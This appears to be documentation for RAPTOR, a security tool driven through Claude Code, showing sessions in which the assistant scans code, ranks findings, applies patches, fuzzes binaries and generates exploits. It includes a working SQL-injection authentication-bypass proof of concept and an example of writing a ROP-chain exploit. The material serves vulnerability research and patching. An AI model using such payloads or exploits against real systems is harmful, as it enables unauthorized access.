Claude Code Integration

/scan

/agentic

/codeql

/fuzz

/web

/analyze

/create-skill

User: /scan

Claude: [Executes raptor.py agentic]
        [Scan completes]

        Results: 15 vulnerabilities found

        Analyzing with adversarial thinking:
        - 2 Secrets (instant compromise) - REVIEW FIRST
        - 5 SQLi (database access) - REVIEW SECOND  
        - 3 Auth issues (broken access control) - REVIEW THIRD
        - 5 Config issues - REVIEW LAST

        What next?
        1. Deep - Analyze top findings
        2. Fix - Apply patches/improve exploits
        3. Generate report - Export results
        4. Retry - Different parameters
        5. Done - Finish

        Your choice? [1-5]

User: 2

Claude: Reviewing Python-generated patches...
        Found 2 template patches. Using Patch Engineer persona...
        ✓ All patches now production-ready
        Apply patches? [Y/n]

User: Y

Claude: [Applies patches using Edit tool]
        ✓ Patches applied successfully
        Run /scan again to verify fixes? [Y/n]

"Use exploit developer persona to create PoC for finding #42"
"Use crash analyst persona to analyze this crash"
"Use fuzzing strategist persona to recommend AFL parameters"
"Use patch engineer persona to create production-ready patch"

User: Finding #7 shows SQL injection. Use exploit developer persona to create a working PoC.

Claude: [Loads exploit_developer.md - 650 tokens]
        
        Analyzing SQLi in login.php:42...
        
        ```python
        #!/usr/bin/env python3
        """
        SQL Injection PoC for login.php
        
        Demonstrates authentication bypass via union-based SQLi
        """
        import requests
        
        TARGET = "http://target.com/login"
        payload = "' OR 1=1 -- "
        
        response = requests.post(TARGET, data={
            "username": payload,
            "password": "x"
        })
        
        if "admin" in response.text:
            print("[+] SQLi successful - authentication bypassed")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print("[-] Exploit failed")

### Patch Engineer Persona

Creates production-ready secure patches (not recommendations):

--- login.php (original)
+++ login.php (patched)
@@ -40,3 +40,4 @@
 function authenticate($username, $password) {
-    $query = "SELECT * FROM users WHERE name='$username'";
+    // Fixed: Use parameterized query to prevent SQL injection
+    $stmt = $pdo->prepare("SELECT * FROM users WHERE name=?");
+    $stmt->execute([$username]);

### Security Researcher Persona

Validates exploitability using a 4-step framework:

<Steps>
  <Step title="Source Control Analysis">
    Is the data source attacker-controlled?
  </Step>
  <Step title="Sanitizer Analysis">
    Are sanitizers effective or bypassable?
  </Step>
  <Step title="Reachability Analysis">
    Can an attacker trigger this code path?
  </Step>
  <Step title="Impact Assessment">
    What's the worst-case scenario?
  </Step>
</Steps>

Use this persona to distinguish real vulnerabilities from false positives:

### Crash Analyst Persona

Analyzes binary crashes from fuzzing:

## Adversarial Thinking

RAPTOR prioritizes findings using an adversarial mindset:

### Prioritization Formula

### Default Priority Order

<AccordionGroup>
  <Accordion title="1. Secrets - Instant Compromise" icon="key">
    Hardcoded credentials, API keys, tokens - no exploitation needed, instant access
  </Accordion>
  <Accordion title="2. Input Validation - High Exploitability" icon="shield-xmark">
    SQLi, XSS, command injection - common and highly exploitable
  </Accordion>
  <Accordion title="3. Authentication - Critical Impact" icon="lock-open">
    Broken access control, authentication bypass - direct compromise
  </Accordion>
  <Accordion title="4. Cryptography - Data Protection" icon="fingerprint">
    Weak algorithms, hardcoded keys - affects data security
  </Accordion>
  <Accordion title="5. Configuration - Security Baseline" icon="gear">
    Debug mode, insecure defaults - environmental risks
  </Accordion>
</AccordionGroup>

<Info>
You can override the default priority order by telling Claude to use a different ranking based on your threat model.
</Info>

## Output Structure

All results are saved to the `out/` directory:

### Accessing Results

<Tabs>
  <Tab title="Claude Code">
    Claude automatically reads, analyzes, and presents results in a prioritized format
  </Tab>
  <Tab title="Python CLI">
    Read files directly from the `out/` directory or parse SARIF with your own tools
  </Tab>
</Tabs>

## Troubleshooting

### Placeholder Exploits (TODO Comments)

**Issue:** Python generated template code instead of working exploits

**Solution:** Use Exploit Developer persona

### Template Patches

**Issue:** Patches are recommendations, not actual code

**Solution:** Use Patch Engineer persona

### No Findings Returned

**Common Causes:**
- Git not initialized (Semgrep needs `.git/` directory)
- Wrong policy groups specified
- Language not supported by scanners

**Solution:** Ask Claude for help

### LLM API Errors

**Python handles automatic fallback:** Claude → GPT-4 → Ollama

**Check:**

```bash
# Verify API key is set
echo $ANTHROPIC_API_KEY

# Check connectivity
curl -I https://api.anthropic.com

User: /scan

Claude: Found 8 vulnerabilities:
        - 2 SQL injection (HIGH)
        - 3 XSS (MEDIUM)
        - 3 Config issues (LOW)
        
        Top priority: SQLi in login.php:42

User: Use security researcher persona to validate the SQLi

Claude: EXPLOITABLE (High confidence)
        - Source: HTTP POST parameter (attacker-controlled)
        - Sanitizer: None (string concatenation)
        - Reachability: Public endpoint
        - Impact: Database access, auth bypass

User: Create exploit and patch

Claude: [Generates working Python PoC]
        [Creates secure parameterized query patch]
        
        Apply patch now? [Y/n]

User: Y

Claude: ✓ Patch applied to login.php
        ✓ Verified: No more string concatenation
        Run /scan to verify? [Y/n]

User: /fuzz --binary ./target --duration 3600

Claude: [Executes AFL++ for 1 hour]
        
        Results: 3 unique crashes
        - crash_001: SIGSEGV at 0x4141414141 (controlled)
        - crash_002: SIGSEGV at 0x00000000 (NULL deref)
        - crash_003: SIGABRT from malloc (heap corruption)

User: Use crash analyst persona for crash_001

Claude: [Analyzes crash]
        
        EXPLOITABILITY: HIGH
        - Buffer overflow with RIP control
        - ASLR + DEP enabled
        - Strategy: ROP chain + leak
        
        Generate exploit? [Y/n]

User: Y

Claude: [Creates C exploit with ROP chain]
        ✓ Exploit saved to out/exploits/crash_001_exploit.c

User: I found that checking API authentication endpoints first
      helps me find critical issues faster

Claude: That's a valuable approach!

User: /create-skill

Claude: What successful approach should we save?

User: Focus on API security - check auth endpoints first,
      then rate limiting, then data validation

Claude: [Extracts patterns]
        [Validates token budget: 380 tokens]
        
        Skill: api_security_auth_focus
        Triggers: API, authentication, auth bypass
        
        Create? [Y/n]

User: Y

Claude: ✓ Saved to: tiers/specialists/custom/api_security_auth_focus.md
        
        Note: Auto-loading not yet implemented (alpha feature)